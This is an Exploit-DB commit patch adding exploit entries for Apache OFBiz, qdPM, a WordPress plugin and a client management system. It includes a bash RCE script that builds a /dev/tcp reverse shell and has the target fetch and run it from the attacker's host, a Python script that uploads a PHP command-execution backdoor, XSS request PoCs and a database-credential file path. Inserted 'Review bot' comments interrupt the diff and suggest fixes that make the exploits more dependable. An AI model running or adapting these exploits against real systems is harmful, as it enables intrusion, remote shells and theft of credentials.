From 2bcb3e5c5e1961dd722935d4bb936d0d6fab634f Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 5 Aug 2021 05:01:56 +0000
Subject: [PATCH] DB: 2021-08-05
6 changes to exploits/shellcodes
WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)
ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments
---
 exploits/java/webapps/50178.sh | 78 +++++++++++++++++++++++
 exploits/php/webapps/49352.txt | 1 +
 exploits/php/webapps/50174.txt | 15 +++++
 exploits/php/webapps/50175.py | 112 +++++++++++++++++++++++++++++++++
 exploits/php/webapps/50176.txt | 9 +++
 exploits/php/webapps/50177.txt | 63 +++++++++++++++++++
 files_exploits.csv | 5 ++
 7 files changed, 283 insertions(+)
 create mode 100755 exploits/java/webapps/50178.sh
 create mode 100644 exploits/php/webapps/50174.txt
 create mode 100755 exploits/php/webapps/50175.py
 create mode 100644 exploits/php/webapps/50176.txt
 create mode 100644 exploits/php/webapps/50177.txt
diff --git a/exploits/java/webapps/50178.sh b/exploits/java/webapps/50178.sh
new file mode 100755
index 000000000..ad275485f
--- /dev/null
+++ b/exploits/java/webapps/50178.sh
@@ -0,0 +1,78 @@
+# Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments
+# Date: 2021-08-04
+# Exploit Author: Álvaro Muñoz, Adrián Díaz (s4dbrd)
+# Vendor Homepage: https://ofbiz.apache.org/index.html
+# Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip
+# Version: 17.12.01
+# Tested on: Linux
+
+# CVE : CVE-2020-9496
+
+# Reference: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
+
+# Description: This CVE was discovered by Alvaro Muñoz, but I have created this POC to automate the process and the necessary requests to successfully exploit it and get RCE.
+
+#!/usr/bin/env bash
+
+# Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization.
+# This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team.
+#
+# This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc.
+# A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.
+#
+# Steps to exploit:
+#
+# Step 1: Host HTTP Service with python3 (sudo python3 -m http.server 80)
+# Step 2: Start nc listener (Recommended 8001).
+# Step 3: Run the exploit.
+
+
+url='https://127.0.0.1' # CHANGE THIS
+port=8443 # CHANGE THIS
+
+function helpPanel(){
+ echo -e "\nUsage:"
+ echo -e "\t[-i] Attacker's IP"
+ echo -e "\t[-p] Attacker's Port"
+ echo -e "\t[-h] Show help pannel"
+ exit 1
+}
+
+
+function ctrl_c(){
+ echo -e "\n\n[!] Exiting...\n"
+ exit 1
+}
+# Ctrl + C
+trap ctrl_c INT
+
+function webRequest(){
+ echo -e "\n[*] Creating a shell file with bash\n"
+ echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/$ip/$ncport 0>&1" > shell.sh
+ echo -e "[*] Downloading YsoSerial JAR File\n"
+ wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar
+ echo -e "[*] Generating a JAR payload\n"
+ payload=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget $ip/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n")
+ echo -e "[*] Sending malicious shell to server...\n" && sleep 0.5
+ curl -s $url:$port/webtools/control/xmlrpc -X POST -d "ProjectDiscoverytest$payload" -k -H 'Content-Type:application/xml' &>/dev/null
+ echo -e "[*] Generating a second JAR payload"
+ payload2=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n")
+ echo -e "\n[*] Executing the payload in the server...\n" && sleep 0.5
+ curl -s $url:$port/webtools/control/xmlrpc -X POST -d "ProjectDiscoverytest$payload2" -k -H 'Content-Type:application/xml' &>/dev/null
+ echo -e "\n[*]Deleting Files..."
+ rm ysoserial-master-d367e379d9-1.jar && rm shell.sh
+}
+
+declare -i parameter_enable=0; while getopts ":i:p:h:" arg; do
+ case $arg in
+ i) ip=$OPTARG; let parameter_enable+=1;;
+ p) ncport=$OPTARG; let parameter_enable+=1;;
+ h) helpPanel;;
+ esac
+done
+
+if [ $parameter_enable -ne 2 ]; then
+ helpPanel
+else
+ webRequest
+fi
\ No newline at end of file
diff --git a/exploits/php/webapps/49352.txt b/exploits/php/webapps/49352.txt
index e7f524bc3..daa3dd95f 100644
--- a/exploits/php/webapps/49352.txt
+++ b/exploits/php/webapps/49352.txt
@@ -8,6 +8,7 @@
 # Affected Version: Version 1
 # Patched Version: Unpatched
 # Category: Web Application
+# CVE: CVE-2021-25791
 
 Step 1: Create a new user then login
 Step 2: Click on "Register" page to register a room.
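Review bot: The `#!/usr/bin/env bash` line is the 15th line of the new file, below the comment header, so the kernel never reads it: with mode 100755 the script is started by whatever shell the caller falls back to, and the bash-only `function`, `let`, `&>` and `echo -e` used in helpPanel and webRequest are not guaranteed to behave there; the interpreter line must be line 1, with the header comments moved below it. The `getopts ":i:p:h:"` spec also declares `-h` as taking an argument, so a bare `-h` is reported through the missing `:` arm and reaches helpPanel only because parameter_enable is not 2; `":i:p:h"` plus a `:)`/`\?)` arm would make the option match its own usage text. Finally, the JAR fetched with `wget -q` is passed straight to `java -jar` with no integrity check, so whoever runs the script is executing whatever that URL serves that day; recording the artifact's expected checksum and verifying it before use makes that trust explicit.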
diff --git a/exploits/php/webapps/50174.txt b/exploits/php/webapps/50174.txt
new file mode 100644
index 000000000..2b11d48f3
--- /dev/null
+++ b/exploits/php/webapps/50174.txt
@@ -0,0 +1,15 @@
+# Exploit Title: WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)
+# Date: 2021-08-03
+# Exploit Author: Aryan Chehreghani
+# Software Link: https://wordpress.org/plugins/customize-login/
+# Version: 1.1
+# Tested on: Windows 10
+
+How to Reproduce this Vulnerability:
+
+1. Install WordPress 5.8
+2. Install and activate WP Customize Login
+3. Navigate to Customize Login under Settings Tab >> enter the XSS payload into the Change Logo Title input field.
+4. Click Save Changes.
+5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
+6. Payload Used: ">
\ No newline at end of file
diff --git a/exploits/php/webapps/50175.py b/exploits/php/webapps/50175.py
new file mode 100755
index 000000000..3685a1e7e
--- /dev/null
+++ b/exploits/php/webapps/50175.py
@@ -0,0 +1,112 @@ +# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) +# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net +# Date: 2021-08-03 +# Original Exploit Author: Rishal Dwivedi (Loginsoft) +# Original ExploitDB ID: 47954 +# Exploit Author: Leon Trappett (thepcn3rd) +# Vendor Homepage: http://qdpm.net/ +# Software Link: http://qdpm.net/download-qdpm-free-project-management +# Version: <=1.9.1 +# Tested on: Ubuntu Server 20.04 (Python 3.9.2) +# CVE : CVE-2020-7246 +# Exploit written in Python 3.9.2 +# Tested Environment - Ubuntu Server 20.04 LTS +# Path Traversal + Remote Code Execution + +#!/usr/bin/python3 + +import sys +import requests +from lxml import html +from argparse import ArgumentParser + +session_requests = requests.session() + +def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar): + request_1 = { + 'sf_method': (None, 'put'), + 'users[id]': (None, userid[-1]), + 'users[photo_preview]': (None, uservar), + 'users[_csrf_token]': (None, csrftoken_[-1]), + 'users[name]': (None, username[-1]), + 'users[new_password]': (None, ''), + 'users[email]': (None, EMAIL), + 'extra_fields[9]': (None, ''), + 'users[remove_photo]': (None, '1'), + } + return request_1 + + +def req(userid, username, csrftoken_, EMAIL, HOSTNAME): + request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, +'.htaccess') + new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', +files=request_1) + request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, +'../.htaccess') + new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', +files=request_2) + request_3 = { + 'sf_method': (None, 'put'), + 'users[id]': (None, userid[-1]), + 'users[photo_preview]': (None, ''), + 'users[_csrf_token]': (None, csrftoken_[-1]), + 'users[name]': (None, username[-1]), + 'users[new_password]': (None, ''), + 'users[email]': (None, EMAIL), + 'extra_fields[9]': (None, ''), + 'users[photo]': ('backdoor.php', + '"; $cmd = 
($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>' + , 'application/octet-stream'), + } + upload_req = session_requests.post(HOSTNAME + +'index.php/myAccount/update', files=request_3) + + +def main(HOSTNAME, EMAIL, PASSWORD): + url = HOSTNAME + '/index.php/login' + result = session_requests.get(url) + #print(result.text) + login_tree = html.fromstring(result.text) + authenticity_token = +list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0] + payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, +'login[_csrf_token]': authenticity_token} + result = session_requests.post(HOSTNAME + '/index.php/login', +data=payload, headers=dict(referer=HOSTNAME + '/index.php/login')) + # The designated admin account does not have a myAccount page + account_page = session_requests.get(HOSTNAME + 'index.php/myAccount') + account_tree = html.fromstring(account_page.content) + userid = account_tree.xpath("//input[@name='users[id]']/@value") + username = account_tree.xpath("//input[@name='users[name]']/@value") + csrftoken_ = +account_tree.xpath("//input[@name='users[_csrf_token]']/@value") + req(userid, username, csrftoken_, EMAIL, HOSTNAME) + get_file = session_requests.get(HOSTNAME + 'index.php/myAccount') + final_tree = html.fromstring(get_file.content) + backdoor = +final_tree.xpath("//input[@name='users[photo_preview]']/@value") + print('Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' + +backdoor[-1] + '?cmd=whoami') + + +if __name__ == '__main__': + print("You are not able to use the designated admin account because +they do not have a myAccount page.\n") + parser = ArgumentParser(description='qdmp - Path traversal + RCE +Exploit') + parser.add_argument('-url', '--host', dest='hostname', help='Project +URL') + parser.add_argument('-u', '--email', dest='email', help='User email +(Any privilege account)') + parser.add_argument('-p', '--password', dest='password', help='User +password') + args = parser.parse_args() + # Added detection if 
the arguments are passed and populated, if not +display the arguments + if (len(sys.argv) > 1 and isinstance(args.hostname, str) and +isinstance(args.email, str) and isinstance(args.password, str)): + main(args.hostname, args.email, args.password) + else: + parser.print_help()
\ No newline at end of file
diff --git a/exploits/php/webapps/50176.txt b/exploits/php/webapps/50176.txt
new file mode 100644
index 000000000..77ff54d95
--- /dev/null
+++ b/exploits/php/webapps/50176.txt
@@ -0,0 +1,9 @@
+# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
+# Date: 03/08/2021
+# Exploit Author: Leon Trappett (thepcn3rd)
+# Vendor Homepage: https://qdpm.net/
+# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
+# Version: 9.2
+# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4
+
+The password and connection string for the database are stored in a yml file. To access the yml file you can go to http:///core/config/databases.yml file and download.
\ No newline at end of file
diff --git a/exploits/php/webapps/50177.txt b/exploits/php/webapps/50177.txt
new file mode 100644
index 000000000..fb45063d3
--- /dev/null
+++ b/exploits/php/webapps/50177.txt
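Review bot: The header of 50175.py states `# Version: <=1.9.1` while the Exploit Title, the Google dork and the CSV row all say qdPM 9.1, so a reader triaging which releases are affected gets two contradictory answers from the same file; the header should carry the version the PoC was actually run against, `# Version: 9.1`. The `#!/usr/bin/python3` line is also the 16th line of the file, below the comment block, so with mode 100755 the kernel ignores it and the file only runs when invoked through `python3` explicitly; it belongs on line 1. The `# Date: 2021-08-03` in the header likewise disagrees with the 2021-08-04 recorded for this entry in files_exploits.csv.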
@@ -0,0 +1,63 @@
+# Exploit Title: Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)
+# Date: 2021-08-04
+# Exploit Author: Mohammad Koochaki
+# Vendor Homepage: https://phpgurukul.com/client-management-system-using-php-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10841
+# Version: 1.1
+# Tested on: Ubuntu 20.04.2 LTS, PHP 7.4.3
+
+### This application is prone to a cross-site scripting in the 'searchdata'
+parameter at the following path:
+ - Reflected: http://localhost/admin/search-invoices.php
+ - Reflected: http://localhost/client/search-invoices.php
+ - Stored: http://localhost/client/client-profile.php
+
+### Payloads:
+ - Reflected:
+ - Stored: ">Anuj+Kumar
+
+### PoC:
+
+## Reflected:
+POST /admin/search-invoices.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 77
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/admin/search-invoices.php
+Cookie: PHPSESSID=o5thu5n92ac58evl71eou90krs
+Upgrade-Insecure-Requests: 1
+DNT: 1
+Sec-GPC: 1
+
+searchdata=&search=
+
+
+## Stored:
+POST /client/client-profile.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 335
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/client/client-profile.php
+Cookie: PHPSESSID=o5thu5n92ac58evl71eou90krs
+Upgrade-Insecure-Requests: 1
+DNT: 1
+Sec-GPC: 1
+
+cname=">Anuj+Kumar&comname=PHPGurukul+Programming+Blog&address=New+Delhi&city=New+Delhi&state=Delhi&zcode=110001&wphnumber=9354778033&cellphnumber=9354778033&ophnumber=9354778033&email=phpgurukulofficial%
+40gmail.com&websiteadd=https%3A%2F%2Fphpgurukul.com¬es=New+User&submit=
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 85275e73d..af83c88d3 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44304,3 +44304,8 @@ id,file,description,date,author,type,platform,port
 50171,exploits/php/webapps/50171.txt,"Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)",2021-08-02,"Mohammad Koochaki",webapps,php,
 50172,exploits/hardware/webapps/50172.txt,"Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF",2021-08-02,LiquidWorm,webapps,hardware,
 50173,exploits/php/webapps/50173.py,"Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE)",2021-08-03,"Merbin Russel",webapps,php,
+50174,exploits/php/webapps/50174.txt,"WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)",2021-08-04,"Aryan Chehreghani",webapps,php,
+50175,exploits/php/webapps/50175.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)",2021-08-04,"Leon Trappett",webapps,php,
+50176,exploits/php/webapps/50176.txt,"qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)",2021-08-04,"Leon Trappett",webapps,php,
+50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",2021-08-04,"Mohammad Koochaki",webapps,php,
+50178,exploits/java/webapps/50178.sh,"ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments",2021-08-04,"Adrián Díaz",webapps,java,
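Review bot: The new 50178 row credits only "Adrián Díaz" while the header of exploits/java/webapps/50178.sh in the same commit lists "Álvaro Muñoz, Adrián Díaz (s4dbrd)", and all five added rows carry 2021-08-04 although 50174 says `# Date: 2021-08-03` and 50176 says `# Date: 03/08/2021`; the index is what tooling and searches read, so the author and date columns should match the files they point at. The 50176 header is also the only one using a DD/MM/YYYY date where every other entry in view uses ISO form, which is worth normalising to `# Date: 2021-08-03` so the two cannot be misread as 8 March.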